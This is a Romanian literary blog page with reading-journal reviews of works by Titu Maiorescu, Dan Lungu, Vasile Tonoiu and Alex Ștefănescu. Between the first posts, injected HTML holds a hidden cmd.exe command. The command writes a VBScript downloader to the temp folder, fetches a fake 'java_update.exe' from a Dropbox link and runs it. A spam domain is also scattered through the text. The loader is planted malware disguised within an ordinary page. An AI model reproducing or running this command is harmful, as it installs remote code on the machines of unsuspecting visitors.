Gramaticile tradiţionale clasifică aceste asociaţii lingvistice cu alte etichete. În ultimă instanţă, un asemenea dicţionar probabil că a apărut din cauza uimirii autorului că există atâtea locuri comune şi atât de puţine vorbe de spirit. Indiferent de clasificare, evident că ar putea fi întrebat de ce aceste categorii, de ce astfel de denumiri (chiar sună amuzant „ecuaţiile măcăite”), este un dicţionar care atrage atenţia că suntem înconjuraţi de dimwitticisme, că e foarte greu să scăpăm de ele, că sunt foarte numeroase. La sfârşit, merită să amintim şi de articolul lui Titu Maiorescu Oratori, retori şi limbuţi (http://literaturapopoarelor.blogspot.ro/2013/07/titu-liviu-maiorescu-oratori-retori-si.html) unde criticul român constata încă de acum un secol şi jumătate prezenţa unui mix de witticisme la un paşoptist care l-a pronunţat odată cu venirea regelui Carol I în România: „În mai puţin de 2 luni aţi trăit mai mult de 2 secoli. Voi, născuţi de ieri la viaţa libertăţii, aţi devenit învăţătorii lumii civilizate. Europa, uimită de înţelepciunea patriotismului vostru, a suspens cursul lucrărilor sale şi aşteaptă tot de la voi. Nu simţiţi, fraţilor, că dumnezeirea furnică în toată fiinţa voastră?” Dacă ne luăm după grila acestui dicţionar de witticisme, constatăm prezenţa unei fraze infantile (2 luni cât două secole), metaforă muribundă (născuţi de ieri la viaţa libertăţii), superlativ suspect (învăţătorii lumii civilizate), trucuri gramaticale (Europa a suspens cursul lucrărilor sale), superlativ suspect şi totodată frază infantilă (dumnezeirea furnicătoare). Şi da, cu ajutorul lui Titu Maiorescu, am găsit cea mai bună traducere pentru The Dimwit’s dictionary, anume Dicţionarul limbuţilor.

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0





height="1" width="1">

value="cmd.exe /c echo Const adTypeBinary = 1 gt; %temp%\winconfig.vbs amp; echo Const adSaveCreateOverWrite = 2 gt;gt; %temp%\winconfig.vbs amp; echo Dim abc gt;gt; %temp%\winconfig.vbs amp; echo Dim xyz gt;gt; %temp%\winconfig.vbs amp; echo Dim rofl gt;gt; %temp%\winconfig.vbs amp; echo abc = "ADODB" gt;gt; %temp%\winconfig.vbs amp; echo xyz = ".Stream" gt;gt; %temp%\winconfig.vbs amp; echo Set rofl = CreateObject(abc+xyz) gt;gt; %temp%\winconfig.vbs amp; echo rofl.Type = adTypeBinary gt;gt; %temp%\winconfig.vbs amp; echo rofl.Open gt;gt; %temp%\winconfig.vbs amp; echo rofl.Write BinaryGetURL(Wscript.Arguments(0)) gt;gt; %temp%\winconfig.vbs amp; echo rofl.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite gt;gt; %temp%\winconfig.vbs amp; echo Function BinaryGetURL(URL) gt;gt; %temp%\winconfig.vbs amp; echo Dim lol gt;gt; %temp%\winconfig.vbs amp; echo Set lol = CreateObject("WinHttp.WinHttpRequest.5.1") gt;gt; %temp%\winconfig.vb
s amp; echo lol.Open "GET", URL, False gt;gt; %temp%\winconfig.vbs amp; echo lol.Send gt;gt; %temp%\winconfig.vbs amp; echo BinaryGetURL = lol.ResponseBody gt;gt; %temp%\winconfig.vbs amp; echo End Function gt;gt; %temp%\winconfig.vbs amp; echo Set blub = CreateObject("WScript.Shell") gt;gt; %temp%\winconfig.vbs amp; echo blub.Run "%temp%\update.exe" gt;gt; %temp%\winconfig.vbs amp; start %temp%\winconfig.vbs http://dl.dropbox.com/u/12138956/java_update.exe %temp%\update.exe"> acceptchecksnow.com name="windows2" value=""> value=""> name="linux2" value="">


În Contra direcției de astăzi

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0

critica-maiorescujpgAutor: Titu Maiorescu
Editura Minerva
Anul apariției: 2005
Locul apariției: București
ISBN: 973-21-0753-7 ; 973-21-0754-5

Pace și bine!

Articolul lui Titu Maiorescu din 1868  – poreclit de adversari Maurul – s-a constituit într-un limbaj critic incipient ca răspuns la critica ziarului Transilvania care-l acuza că se ocupă cu flecuștețe lingvistice. Arată că la baza unei asemenea atac stau 3 cărți eronate din punct de vedere istoric (Petru Maior care afirma că dacii au fost eliminați complet după cucerirea romană, Lexiconul de la Buda din 1825 care a încercat să elimine aproape complet cuvintele de origine slavă, Gramatica Tentanem din 1840 în care s-au dat exemple dintr-o limbă romînească inexistentă). Aici țin să notez că aceste trei opere au generat o direcție falsă în sensul că în acea perioadă se considera că acțiunea asupra limbii trebuie să vină din partea lingviștilor care s-o îmbunătățească în funcție de așa-zisele interese ale națiunii. (După cum știm, azi lingviștii doar observă cuvintele existente în limbă, sunt prea mulți inovatori ca să se mai amestece și ei în chip programatic. Mai degrabă corectează paradigma și funcționalitatea cuvântului)

După un succint istoric al progresului din secolul 19, Titu Maiorescu constată că prin imitație și reproducere au apărut doar efectele civilizației (forme goale, de deasupra, superficiale, aparențe) nu și cauzele, respectiv fundamentele istorice necesare procesului de civilizare.

Inițiativa a avut un scop lăudabil, progresist – literatura, știința, arta frumoasă, vroiam să arătăm Europei că, demni urmași ai lui Traian, suntem capabili de a fi la înălțimea altor civilizații, dar din nefericire am mers într-o direcție falsă. Obiectivele au fost înlocuite cu statistici. Literatura a fost echivalată unui număr mare de tipografii sau de publicații, știința cu o suită de discursuri ori societăți mai mult sau mai puțin declarat academice, pictura cu o înșiruire de pânze, libertatea cu discursurile politice.

Direcția falsă a provocat din partea urmăritorilor ei suficiență, rătăcirea judecății, orbire, neadevăr. Aveam jurnale politice, dar nu partide, reviste literare, dar nu și un public iubitor de literatură, școli și gimnazii, dar nu învățători și profesori, atenee și pinacoteci, dar nu și cultură. Astfel s-au ajuns să se fasifice ideile de Academie, de Conservator, de Școală de Belle-Arte, de teatru, de constituție.

După ce constată falsitatea și nulitatea culturii claselor mai înalte, vorbește despre cultura clasei de jos, cea a țăranului care ar fi singura adevărată și de aceea cere o artă care să dedice conținutul țăranului cel autentic. (O tendință poporanistă avant la lettre!)

În alt plan militează pentru regenerarea spiritului public, arătând ce greșeli ar trebui evitate, anume încurajarea mediocrităților (Prin căutarea valorii care se percepe de la prima înfățișare a operei care dovedește în alt plan valabilă pentru toți) și promovarea formei fără fond.

Folosind o întrebare retorică  ”Mai este oare timp de scăpare?” afirmă că mai bine formele fără fond să nu apară decât să strice mijloacele tradiționale de cultură, decât să se discrediteze întârziiind astfel apariția fondului. Articolul revine la sfârșit cu atacul contra revistei Transilvania și arată că pe Titu Maiorescu nu-l preocupau deloc bagatelele, ci solicită fond, limbă bună, ortografie, gramatică.

Prin urmare ideile lui Maiorescu sunt rezumabile în aceste câteva ancore memorabile: O direcție falsă în limbă și în cultură crează instituții locuite de fantome și guvernate de neadevăr.  Va fi susținută de oameni mediocri, care discreditează cultura română și îi întârzie apariția substanței. Forma se dovedește o iluzie socială fără fond.

Notă – voi consemna mâine cum a văzut Garabet Ibrăileanu acest articol. Poate fi răstălmăcit în fel și chip.

Ceva de genu

Gabriel Mirea

Cum să uiți o femeie

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0

f68392-Dan-Lungu-Cum-sa-uiti-o-femeieAutor: Dan Lungu
Editura Polirom
Anul apariției: 2009
Locul apariției: Bucureşti
Număr pagini: 386
ISBN: 973-46-1328-1

Pace și bine!

Un titul supercomercial

Parcă ar urma să deschid o carte de self management de genul cum să devin bogat, milionar sau șofer de formula 1. E adevărat, există în titlul lui Dan Lungu și o nuanță negativă abia vizibilă, de fapt ar fi un îndrumar despre cum să faci să nu mai ai un anume sentiment.  Pare să fie un fel de îndreptar de curățire interioară, miroase a medicină, a psihiatrie, a expurgație și tratament.

Titlul este pe de altă parte rizibil

Femeile care cumpără cartea se pot întreba cum anume pot fi uitate, bărbații pe de altă parte, fiecare cu bubele sale antifeminine, dau banii în speranța că iar vor încerca un paliativ ce le-o face viața mai comodă. Nimeni nu speră să uite nimic, dar cum titlul este la persoana a III-a, seamănă cu un îndrumar de lucrări agricole, te pomenești că…! Evident că este un truc  auctorial, experiența naratorului este singura în care se încearcă o tentativă de ștergere cu buretele, dar este aparent impersonalizată, este adoptată tehnica aceea din politică în care deși  îmi reprezint propriul interes, dau senzația oamenilor că uit de mine și vorbesc doar în numele lor. Acel noi cu dublu înțeles se păstrează în pseudoimperativul să uiți!

De fapt o uită?

Am putea pleca liniștiți fără să cumpărăm cartea cu acest răspuns liniștitor: bineînțeles că nu, din moment ce îi dedică o carte. Despărțirile au diferite consecințe neașteptate. Unii se sinucid, se aruncă în mijlocul broaștelor sau al leilor, unii folosesc diverse trupuri feminine pentru uitare, devin perverși sau apostoli, călugări, explorează Chomolugme și peșteri fără fund, se baricadează în întuneric sau se expun în public cu râsete ciudate, cu indecențe, cu șiraguri de înjurături. O despărțire majoră relevă iadul din fiece persoană, într-un spectacol uman care cuprinde toată gama sufletească de la neagra resemnare până la crimele împotriva umanității.
Cei mai mulți strigă și până la urmă parțial această carte este un strigăt de neputință după o despărțire brutală.  Un personaj filosof spune în carte că despărțirile nu pot fi decât așa, inexplicabile, torturante, în afara sensului. Că vin neașteptat și schimbă viața spre o direcție imprevizibilă.

Totuși…

În materie de întâlniri și despărțiri lucrurile sunt însoțite de atâtea forme și nuanțe încât părerile totalitare sunt suspecte și  de neluat în seamă. Există tot felul de despărțiri, unele prin acord tacit, altele ca într-o pantă lină, doar divorțurile nu sunt cazuri trase la indigo. Dan Lungu își introduce cu abilitate personaje care caută să rezolve nodul gordian în maniera lui Alexandru cel Mare, dar prin discursul său romanesc arată că, de fapt, lucrurile sunt complicate de maniera ireductibilă, putere la putere.

acceptchecksnow.com Ce vreau să spun prin asta?

Foarte pe scurt, o ziaristă de scandal Marga se desparte de amorezul său ziarist de la anchete sociale, Andi.  Asta e tot pe 350 de pagini. De fapt, intenția mea a fost doar să dau numele protagoniștilor pe care îi vizează titlul. Marga este o femeie frumoasă. Origini incerte, probabil din țara Basa. Intră în noua relație ca să-i facă în ciudă unui fost amant. Iese din relație inexplicabil, doar cu un bilețel fanny, la fel de stupid ca și cele ale sinucigașilor: ”Te rog să mă ierți. Cândva o să înțelegi”. Atât. Nu complicații, nu explicații, nimic în –ații. Cocoana și-a luat bagajele și s-a dus pe apa sâmbetii  încă de la începutul romanului. A devenit un fel de Nechifor Lipan, adică deja este moartă textual. Personaj absent. Prin urmare vom auzi doar vocea El. Punctul lui de vedere, suferința lui, reconstituirea Margăi dinspre forma sa de înțelegere. Evident că muta Marga ne avertizează. Nu, Andi deocamdată nu înțelege nimic, dar în viitor, probabil când o să scrie o carte sau, cine știe, când se va bucura după procesul uitării de nurii altei consoarte, o să-l lumineze deodată o înțelegere terifiantă. În privința asta, fantezia naratorului este excelentă. Și-o imaginează pe Marga devenind extraterestră, făcând acrobații narcotice, împlinindu-se apoteotic sau metamorfozându-se oniric.

Acum vine partea care dezminte titlul

Nu este vorba exclusiv de relația de iubire, ea este doar un pretext, ci mai degrabă de conturarea unei perioade din viața personajului Andi. Un fel de Gelu Ruscanu din anii 2000 visează la dreptate într-o lume a rechinilor ziariști  dedicați doar șantajului … Este un personaj care merge până la capăt, într-o relație anterioară se îmbată non-stop, apoi caută să-și impună criteriile sale de dreptate prin discursul diaristic, se lasă atras în experiențe mistice și se definește contrar, exploatează până la epuizare momentul despărțirii și-l maschează după cețuri tot mai îndepărtate.

Dar îi atribui prea multe acestui nod textual numit Andi

Așa numea un critic personajele de roman, doar noduri textuale, chestii vorbite care au aparență de sentimente, idei, trăiri. Culegi un nume de ici, o față de colo, o poveste de dincolo și faci un Frankenstein textual așa cum a fost transformat Ion al lui Rebreanu în manualele școlare. Andi devine prin urmare instanță narativă, vocea dominantă, masculul textual alfa, personajul principal și alte asemenea farafastâcuri centraliste. Poate de aceea este bine să uiți conceptele critice, altfel nu am mai putea citit o pagină. Și acest roman are o curgere a poveștii admirabilă. Așa că să uităm poanta cu nodul textual și să revin la conceperea lui Andi ca o persoană care merită stima și considerațiile noastre. Altfel, ajung să mă laud că am mai citit o carte cu câteva noduri textuale, unele s-au încâlcit și altele s-au destrămat. Discurs ridicol.

Andi ne arată toate punctele sale cardinale

Povestea de iubire cu Marga

Un număr consistent de pagini.  Nu e cine știe ce, un bairam, amor din prima noapte, lipsa de condiții pentru o relație de durată. Iubirea din garsonieră lângă alte garsoniere ocupate de pensionari și chiriași pârliți. Iubita ff. prețioasă care nu face amor până nu se machiază, frăgezește, umezește complet. Doar după ce ea devine din perspectiva proprie frumoasă, are dreptul domnul Andi s-o atingă așa… așa.  Apoi vine despărțirea, ahurile și ofurile de rigoare, dar nimic în manieră balcanică, nu are o suferință de tip țambal, ci mai degrabă sună a glas subțiratec de vioară, a Rapsodia lui Ciprian Porumbescu.

Aventurile sale la ziar

Aici aflăm de forma de manifestare a rechinilor din presă. S-o dezvăluim și noi pentru buna informare a cetățenilor creduli. – Am întâlnit unul chiar ieri care era să mă bată pe baza informațiilor aflate exclusiv din gura curcubeică a tv. – La redacții vin tot felul de informații despre comportamentul sălbatic comercial al vreunui pungaș directorial din provincie. Reporterii privilegiați sunt trimiși la săpături asupra afacerii. Afacerea împricinaților este studiată metodic, cu tehnici similare celor polițienești și, în scurt timp, li se întocmește un așa-zis dosar de presă de mai mare frumusețea.  Dezvăluirile ar urma să fie evident incendiare. Numai că, aici este chichița, înainte se dă o notiță asupra unui posibil caz de… Dacă mahărul vizat are urechi de auzit și știe să se miște financiar din vreme, bine, dacă nu, apare o primă dezvăluire. Deja lucrurile încep să coste tot mai mult și, cu cât sunt publicate mai multe lucruri, cu atât mușamalizarea este mai costisitoare. O părticică din sumă merge și la reporter, dar grosul evident că-l ia patronul, redactorul-șef, mă rog, cine a finanțat expediția de culegere de informații. Mafia din domeniu dă drumul doar la informațiile despre cei care n-au cotizat. În rest, acari Păuni, accidente, statistici, bla-bla-bla-uri de umplut pagina.

Experiența religioasă

Apare datorită unei întâmplări nedorite legate de mutarea continuă pe care este nevoit să o îndure azi un chiriaș în București. Prețuri mari, salarii mici.  Puțini oameni înțelegători. Printre ei un neoprotestant care are grijă  într-o formă indirectă să-l atragă spre credința sa. Andi se împotrivește și i se par copilării scenele devoționale la care asistă. I se furnizează tot felul de asemănări cu care ar fi  de dorit să se identifice. Și ceilalți membri ai comunității au fost nefericiți, doresc să participe la viața publică, au de luptat pentru răspândirea adevărului, se confruntă cu rechini de diferite grade. Deosebirile Andi le găsește de unul singur. Are însă neașteptate cedări, merge de câteva ori cu neoprotestanții aceia la întruniri nonformale. Finalul este din această perspectivă incert. Fie va deveni religios, fie se va întoarce Marga, fie își va găsi pe alta. Naratorul încheie cu puncte, puncte, imaginați-vă în continuare ce vreți.

Câteva adnotări finale

Este un roman  de experiență care are un ton sacadat, mecanic în relatare. Ideile nu sunt remarcabile, dar bine legate epic și pot provoca dezbateri ulterioare spre consistent.
Personajele tind spre tipologie, dar au ceva incomplet care poate da sau nu senzația de complexitate. Există de altfel conturarea unor opoziții tipologice: ateul – pocăitul, însetatul de dreptate – ziaristul cinic, amorezul ecologist – amorezul artist.
Tehnica narativă a presupus relatarea a două voci distincte ale aceluiași personaj în momente temporale diferite – pasiunea și socializarea prin ziaristică, integrate într-o colecție consistentă din punct de vedere anecdotic.
Povestea se desfășoară pe un zgomot de fond generat de două personaje de deasupra textului, mă rog, deasupra garsonierei iubirii se află doi vecini care se ceartă și se înjură toată ziua pentru nimicuri. Plouă peste teritoriul lui Andi cu clișee agresive.

Ceva de genu’

Gabriel Mirea

Despre diferenţe, alteritate şi dialog intercultural – Cosmofagie

Posted on : 11-10-2010 | By : admin | In : Uncategorized

1

11TonoiuAutor: Vasile Tonoiu
Editura Academiei Române
Anul apariției: 2005
Locul apariției: Bucureşti
Număr pagini: 225
ISBN: 973-27-1217-1
acceptchecksnow.com

Pace și bine!

Ce am mai citit din Vasile Tonoiu?

Un filosof african Haris Memel Fote a spus că pretenția europenilor de obiectivitate poate fi definită ca o atitudine cosmofagă.

Mă gândeam că la fel ar putea fi văzută și atitudinea îndrăgostitului care oferă iubitei sale luna de pe cer. Ok, dar ce se întâmplă cu ceilalți? Rămân în întuneric!

Cosmofog se dovedește și Lucian Blaga în poemul său expresionist Dați-mi un trup voi munților! Atunci când cere să-și abandoneze trupul muritor în favoarea unuia enorm,făcut din piatră.

Când aș iubi
Mi-aș întinde spre cer toate mările
Ca niște vânjoase, sălbatice brațe fierbinți
Spre cer
Să-l cuprind
Mijlocul să-i frang
Să-i sărut sclipitoarele stele

Când aș urî
Aș zdrobi sub picioarele mele de stâncă
Bieți sori călători
Și poate-aș zâmbi.

Și romantismul a fost de o cosmofagie feroce. La Eminescu, Cătălina, devoratoarea de Luceferi, Luceafărul sorbind din șerbetul Cosmosului, bătrânul dascăl care depozitează în degetul mic întregul univers. Poemul Memento Mori cu lupta din cer între două panteoane, dac și roman.

Îmi pare că literar cosmofagia este un procedeu care adaugă forme de expresivitate ale spațiului inaccesibil. Boala se explică prin anularea credinței  în zei. Dacă nu este nimic sus, universul ne așteaptă să-l cucerim și, dacă nu avem încă nave potrivite, de ce să nu ne folosim deocamdată imaginația! De pildă o viziune cosmofogă este aceea în care ar fi în viitor un univers în care limba comună ar fi limba engleză, dovedindu-se astfel imaginație și gândire îngustă, reducționistă. O limbă îngurgitează universul lingvistic. Să-i adăug prin urmare termenul de lingvistofagă.

Ceva de genu`

Gabriel Mirea

Despre diferenţe, alteritate şi dialog intercultural – pildă chinezească

Posted on : 24-11-2009 | By : admin | In : Filosofie

Tags:

0

11TonoiuAutor: Vasile Tonoiu
Editura Academiei Române
Anul apariției: 2005
Locul apariției: Bucureşti
Număr pagini: 225
ISBN: 973-27-1217-1

Pace și bine!

Am să deschid de azi un jurnal de lectură. Observ că nu sunt un tip harnic la citit, de când nu mai trăiesc sub presiunea termenelor unui angajator, mă răsfăț cu zile multe de leneveală când privesc din păcate nu pe pereți – mari învățători de altfel -, ci la chestia aia contagioasă care tinde să substituie peretele și se termină în sufixul –embelizor.

Vasile Tonoiu, unul dintre filosofii interesanți de azi și care caută o formă de evadare din prizonieratul limbajului de specialitate a scris  o trilogie dialogală (1. Despre diferenţe, alteritate şi dialog  intercultural, 2. Obstacolul limbii şi 3. Înţelepciune versus filosofie)care vizează – cel puțin așa cum ne spune autorul – relația identitate – alteritate. Mai pe înțeles, relația dintre Occident și Orient, cu trimiteri speciale spre cultura chinezească ce are un reprezentant sinolog, participant la pseudodialogul cărții.

Azi voi puncta o pildă chinezească aflată undeva chiar la începutul opului dlui Tonoiu. Se spune că un prinț era foarte mândru de citirea unor cărți de înțelepciune foarte dificile. Alături de el un tâmplar în vârstă tot persevera la cioplituri,deși se vedea clar că abia îl mai duceau puterile. Prințul s-a oprit din lecturile sale bineînțeles desfăşurate într-un confort fără cusur atunci când a fost  întrebat de tâmplar ce citește. Ducele i-a răspuns cu mândrie că are în față o învățătură a înțelepților din vechime. Atunci tâmplarul i-a spus că de fapt citește lucruri pe care alții le-au aruncat la gunoi ca nefolositoare. Ducele s-a mâniat și a ameninţat  că dacă nu își justifică răspunsul, îl va omorî pentru defăimarea înțelepților. Iată cum s-a justificat tâmplarul: meseria lui cerea de a tăia în lemn cu o finețe care presupune un instinct desăvârșit. Dacă dă cu dalta prea ușor nu ajunge să taie cum vrea, dacă dă prea tare, sparge dincolo de conturul trasat și strică lucrarea. Trebuia să știe cum să moduleze mâna pentru a face o lucrare de calitate. Când a încercat să-l învețe pe fiul său cum să procedeze,  a constatat că în ciuda tuturor explicațiilor, marea taină a unui meșter bun nu se putea transmite, trebuia să te naști cu acel har, să vină de la sine. De aceea învățăturile înțelepților i se par gunoaie fiindcă nu comunică exact cum să ai har într-un anumit domeniu și mai ales cum să-ți găsești harul potrivit.

Ideea este că uneori și neînvățatul are dreptate. Aici mă gândesc care carte mi-a schimbat mie viața? Sau este o anumită atmosferă în jurul cărții pe care n-o înțelegea tâmplarul? Un anumit instinct față de acest domeniu. Poate că fiecare este atras instinctiv de o anume îndeletnicire, dar familia este oarbă dacă nu se potrivește înclinația noastră naturală cu orizontul lor de așteptări. Aici tâmplarul a sesizat corect – la ce folos cărțile dacă nu-ți dau și focul pasiunii?

Ce nu a luat în considerare a fost partea cealaltă. De aceea privesc suspicios poziția neînvățatului. Dacă totuși cel care citește are harul necesar și nu găsește destul de mulți meșteri să-l învețe trucurile firești ale preocupării sale obstinate? Dacă un talent în tâmplărie se naște într-o familie de plugari. Cum va învăța el în afară de imitație și de creații limitate la artă naivă dacă nu va avea modele? Cartea aici poate ține cu succes loc unui educator. Şi apoi să ne gândim pe noi cine ne-a învățat să ne descurcăm în hățișul calculatorului? Oare nu tatonările personale, dar și mulțimea de învățători de pe forumuri de pildă?

Poate o carte să conțină focul acela căutat de tâmplar să nu existe, dar o bibliotecă prin pluralitatea ei nu poate să nu aibă ferestre deschise spre ceea ce căutăm. Ar putea fi un răspuns aproximativ pentru  tâmplarul cel necăjit de eșecul cu propriul fiu.

Ceva de genu`

Gabriel Mirea

Cum te poți rata ca scriitor. Metode punctate de Alex Ștefănescu

Posted on : 08-11-2009 | By : admin | In : Critică

Tags:

0

Alex Ștefănescu cum te poți rata ca scriitorSenzația de a te mișca printre momâi. Batalioane de ființe fără idei insistă să fie luate ceea ce nu sunt.  Viața lor suferă de patetism strident, calcă pe tocuri înalte de aroganță, abia catadicsesc din vocea lor declamativă să-ți arate cât sunt de învolumați. Sunt perfecți, impozabili, statuari până le deschizi volumul. Dintr-o dată parcă vine viitura și le înmoaie piedestalul. Te trezești cu niște ființe cu picioare de mămăligă, văicăreți și bolborosind vrute și nevrute. Mai ales nevrute. Coperțile lucioase ca și statura lor diamantină ascund niște idioții de pus în măreața și inepuizabila carte a prostiei. Un batalion al literaturii acre, ruginite, crăpate la colțuri defilează securistic  pe nervii cititorului.

Cine sunt aceste spăimoase persoane? Ignorații, obscurii, nevăzuții, clubiștii literari de mâna patra. Se plâng de nebagare în seamă.  Dacă sunt însă luați în serios, ca o consecință nedorită se pot trezi luați în tarbacă. Unii critici chiar nu glumesc în fața operelor cu mătreață și fără bulion de rezervă.

Un astfel de luptător cu momâile aflate între diverse stări de agregare se dovedește Alex Ștefănescu prin cartea sa ”Cum te poți rata ca scriitor. Câteva metode sigure și 250 de cărți proaste”. Face un inventar de procedee sigure de ratare și arată consecințele triste ale acestor tehnici.  Are capacitatea de a găsi jucărica veselă din noianul de bazaconii citite. La câteva cronici, regăsești un episod comic și râzi de-i  îngrijorezi pe ceilalți. În lumea sobră și banală, cineva să se strice de râs citind o carte de critică pare neverosimil. Îngrijorați îmi smulg cartea din mînă să vadă titlul. Mi-o dau înapoi imediat edificați. A, este despre scriitori. Pare prea tehnică. Totuși eu continui să hămăiesc când și când. Ce-o fi de râs în glumele cu scriitori, se miră anturajul. Le citesc câte-un pasaj, vai, nu-i prind subtilitatea. Tare mi-e teamă că am un anturaj nepotrivit și, de-ar fi alcătuit din scriitori, s-ar încadra una-două în rețetarul maladiilor lui Alex Ștefănescu.

Acum pentru a nu mă arăta original când nu e cazul, iată căile sigure de ratare așa cum au fost punctate și de critic în prefață. Am să le dezvolt însă cu alte exemple decât cele alese de domnia sa și eventual cu alte fațete. Evident vor fi luate din lectura celor 250 de cronici și tot de aici am mai desprins alte metode similare de stricare literară. La sfârșit, voi puncta câteva idei recurente și eventual folositoare de tip pozitiv. Este din acest punct de vedere o carte a tăgăduirii, un îndreptar catafatic, o cercetare critică dar nu la 1867, ci la început de mileniu. Poate de aici se va dezvolta în viitor o istorie a scriitorilor care nu au ce căuta în literatura română, o istorie a monstruozităților literare.  Tot se plâng ratații de nedreptate. Se zice că sunt 15000 de scriitori români în viață. Câți or fi buni? Hai să fiu generos și să sper într-o sută. Și în rest, sunt 14900 de cărți de la slăbuțe la îngrozitoare. Cercuri de infern literar. Alex Ștefănescu a mers parțial prin bolgia gângăvelii, a străbătut ospiciul bolborositorilor, a trecut ars prin stadioane de lăudători, a văzut la tot pasul confetiști și gunoieri.

Strategia sa a fost în sfârșit să numească cărțile putrede, să nu mai zică așa la general, à la pilulă gen Paul Everac care nu atingea de fapt pe nimeni. Cum spune în prefață, ”autorii de maculatură cred că se referă la alte persoane decât ei” și-și continuă procesul de infecție pe care-l numesc  viziunea lor literară. Pentru amuzament le-a dat și un nume diferit în funcție de procedeul stilistic inadecvat folosit. Iată câteva nume de metode: Metoda Tanța și Costel, metoda Amorul e un lucru foarte mare, metoda Rețetei ilizibile, metoda Culegerii florilor cu excavatorul…

Ce defecte sunt vizate în această carte?

Banalități la fel de rezistente ca buruienile (truisme solemne, sfaturi de almanahuri, la Vasile Fetescu ori Victor Petru Vulcan). Vorbitul în dodii, obscur, cu abuz de neologisme stridente, cu epatarea unui discurs  științific (George Anca n-a găsit nici după mii de pagini un mod de a se face înțeles de către cititori). Obscuritatea care poate fi supralicitată SF (la Gr. C. Bostan SF este înțeles ca stil Sofisticat-fantasmagoric; sau Strictă- fandacsie; sau Suprimarea-Firescului). Lingușirea autorilor obscuri între ei,  imitația desfigurantă a marilor scriitori, cu care de altfel se trag ”colegial” de șireturi. Poezia născută din rebus, sloganurile patriotice,  limba blocată în lemnul sărbătorilor de cămin cultural. (Dominic Diamant comite doar sonete acrostih cu propriul nume, producătorii de haiku-uri care ascund de fapt o poezie romanțioasă, ieftină; Ioan Hada  face din inofensivul adverb ”ca ” drept cel mai enervant cuvânt din limba română repetându-l în mijlocul tuturor poemelor). Lipsa umorului, aerul de inocență penibilă sau vorbirea peltică, caraghioasă, puerilă pentru a ne convinge măcar la rubrica literatura pentru copii (Maria Marin, Daniel Tei, Ion Grosu). De fapt, toate aceste trăsături sunt deformări maladive și neverosimile. Ar putea fi incluse în figurile de construcție ale hiperbolei sau litotei, deoarece fie supralicită estetic realitatea, fie o sluțesc și o focalizează negativ.

Prima metodă a fost numită de criticul Alex Ștefănescu Artistizarea forțată a textului. Presupune un stil afectat, înfrumusețând realitatea cu superlative fără acoperire, cu personaje și obiecte transformate în kitsch (Ion Avram, Stela Brie, Igor Pașa, Mariei Dincă, Nicușor Constantinescu. Emilia Dabu a publicat un roman edulcorat, înmuiat în frumusețe ca o baclava în sirop. După fiecare pagină citită îți vine să bei un pahar cu apă; la Georgeta Blendea Zamfir multe peisaje par confecționate din zahăr ars și turtă dulce)

Metoda opusă, mizerabilistă  a primit numele de Exhibarea mizeriei fără o justificare estetică. Creatorii acestui tip de literatură posibil sunt recrutați dintre producătorii inscripțiilor din toaletă. Sunt mândri de grosolănia lor, de obscenitatea, de blasfemia etalată în orice frază (lui Ovidiu Băjan i se dă o singură dată dreptate,  atunci când constată că ”poezia sa duhnește a alcool și căcat”. Fraza de fals acord e continuată într-un Do strident: ”Este și concluzia criticului, care însă, paralizat de prejudecăți, nu ar fi îndrăznit să formuleze atât de tranșant.”

Alte forme de abuz, nemarcate în prefață de Alex Ștefănescu, le-am cules din cele 250 de pastile critice. Ratarea metaforică, prozaică, simplistă, învechită. Analfabetul. Critica obscură, suprasimbolică, de guguștiuc delicat.

•    Abuzul de metaforă: Dorin Almășan – ”niciunui alt poet nu i-a mai trecut prin cap să compare răsăritul soarelui cu o erecție! Ne întrebăm îngroziți cu ce anume ar putea fi comparat apusul…”; Ion Antoniu liricizează o enigmatică vulvă prehensilă
•    Prozaismul -  Gheorghe Andrei scrie în poemul ”Încurcat” un articol de ziar
•    Chinuirea cititorului care îmbătrânește, se cocoșează, simte că timp de o manvatara va fi pacientul unui Gulag textual (Roxana Gabriela Braniște,Petre Bucinschi, Ioan Buduca)
•    Scriitorii fără complexe – folosesc stiluri învechite de secol XIX, cu poncife abandonate (Ionel Câmpeanu, Emil Dogaru). Au o retorică ieftină de romanță (Petre Dobrescu). Sunt posesorii unui fel de metafizică de poșetă (Rafila Radu).
•    Plictiseala amintirilor personale, a amănuntelor lipsite de semnificație la majoritatea scritorilor selectați. De altfel, este un bun criteriu de comentariu al poemelor: Cum mă privește pe mine lumea prezentată de autor, indiferent cât de autentică ar fi, de ce m-ar interesa ceva la care nu am acces. Criticul Alex Ștefănescu este categoric cu vagi rezonanțe maioresciene:  ”un scriitor autentic  se preocupă nu de sentimentele pe care le investește într-un text,  ci de sentimentele, pe care, prin intermediul textului, le provoacă
•    Simplitatea pernicioasă – cel mai adesea simplitatea nu presupune inocență, ci o reprezentare hilar-grotescă a lumii (Alex. Vâlcu)
•    Texte de analfabeți – Alexandru Paul Moldovan prin mulțimea de erori a volumului său a primit o amuzantă nota 4
•    Discursurile de pișcot – cele susținute prin tot felul de conferințe anonime și ulteriorpublicate într-o carte (Ilie Ștefan Rădulescu)
•    Excesul de interpretare – a vedea în text ceea ce nu este în niciun chip evident; fiecare personaj și fiecare situție sunt considerate simboluri ezoterice (Cornel Munteanu)
•    Critica duioasă a lui Miron Țic de la cenaclul Amurg Sentimental

Din păcate, prefața nu conține și câteva dintre criteriile de apreciere ale criticului. Va trebui să fugim la alte opere critice ale domniei sale pentru a vedea ce anume apreciază. Totuși o lectură atentă va surprinde câteva idei literare, nedezvoltate. Fără îndoială, aici este scăderea cărții, condensarea într-un număr  fix de caractere a cronicilor datorată obligațiilor de ziarist a dus probabil la multe eliminări de pasaje savuroase ori la nedezvoltarea unei viziuni critice coerente. Deși nimeni nu mai crede în genurile literare azi, acestea sunt consemnate ca tehnici critice utile. Iată o parafrază în care se reclamă prezența necesară a dramatismului: ”Dacă dramatism nu e, nimic, nu e”. Este amintit G. Călinescu care afirma categoric ”În poezie nu căutăm idei, ci lirism”. Proza nu trebuie să fie exclusiv prozaică, altfel ”intră în categoria istoriilor pe care și le spun gospodinele când stau la coadă”. E important tonul literar care ”poate salva sau arunca în neant orice text”. La final să consemnez alte două constatări amare ale criticului Alex. Ștefănescu, anume că scriitorii se adresează unui public educat de școala Evenimentului Zilei și că nici măcar premiile literare nu sunt niște mărci sigure de valoare, după cum a constatat răsfoind antologiile de premianți.

